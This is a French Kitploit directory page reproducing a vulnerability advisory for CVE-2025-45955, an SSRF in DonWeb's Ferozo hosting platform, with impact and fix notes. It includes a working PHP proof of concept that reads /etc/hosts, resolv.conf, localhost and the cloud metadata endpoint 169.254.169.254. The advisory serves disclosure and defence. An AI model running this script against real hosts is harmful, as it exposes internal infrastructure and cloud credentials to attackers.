Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-45955 — Exploit de preuve de concept pour CVE-2025-45955 démontrant une Falsification de requête côté serveur (SSRF) dans la plateforme d'hébergement DonWeb Ferozo, permettant la cartographie de l'infrastructure interne et l'énumération des métadonnées cloud. | Kitploit
Outils/GitHubGitHub/surendrapuppala7/cve-2025-45955
ReconnaissanceAnalyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebSécurité Cloud
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

Exploit de preuve de concept pour CVE-2025-45955 démontrant une Falsification de requête côté serveur (SSRF) dans la plateforme d'hébergement DonWeb Ferozo, permettant la cartographie de l'infrastructure interne et l'énumération des métadonnées cloud.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
110il y a 8 moisPas encore vérifié

CVE-2025-45955

Falsification de requête côté serveur dans DonWeb Ferozo (CVE-2025-45955)

Description

Un attaquant peut exploiter cette vulnérabilité en téléchargeant et en exécutant un fichier PHP spécialement conçu sur la plateforme d'hébergement Ferozo. Lorsqu'il est accédé, le fichier lance une série de tentatives SSRF ciblant des services internes (tels que 127.0.0.1, 169.254.169.254, ou des points de terminaison de maillage de services), des fichiers locaux (par exemple file:///etc/passwd), et des points de terminaison connus de métadonnées cloud. Le script collecte les réponses ou les messages d'erreur, permettant à l'attaquant de cartographier l'infrastructure interne, d'énumérer les services accessibles et de rassembler des informations sensibles pour une exploitation ultérieure.

Preuve de concept (PoC)

Le code suivant démontre la vulnérabilité :

<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

Composant affecté

  • Plateforme d'hébergement Ferozo (DonWeb)
  • Environnements PHP qui permettent l'exécution de fichiers PHP téléchargés ou contrôlés par l'utilisateur

Impact

  • Divulgation d'informations : Fuite d'IP internes, contenus de fichiers, points de terminaison de métadonnées cloud
  • Reconnaissance d'infrastructure : Permet l'énumération des ports et services (Docker, Kubelet, etc.)
  • Potentiel d'exploitation cloud : Sonde les points de terminaison de métadonnées connus comme AWS, GCP et Alibaba
  • Opportunité de chaînage : Peut être associé à d'autres vulnérabilités locales pour une exécution de code à distance ou un pivotement

Correction

  • Restreindre les fonctions d'inclusion de fichiers et d'accès aux URL (file_get_contents, fopen, etc.)
  • Bloquer l'accès aux plages d'IP internes (127.0.0.0/8, 169.254.169.254, etc.) via les règles de pare-feu sortant
  • Auditer et nettoyer les entrées utilisateur qui peuvent influencer les chemins de fichiers ou les URL

Identifiant CVE

CVE-2025-45955


Découvreur

Signalé par [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]

Télécharger l’outil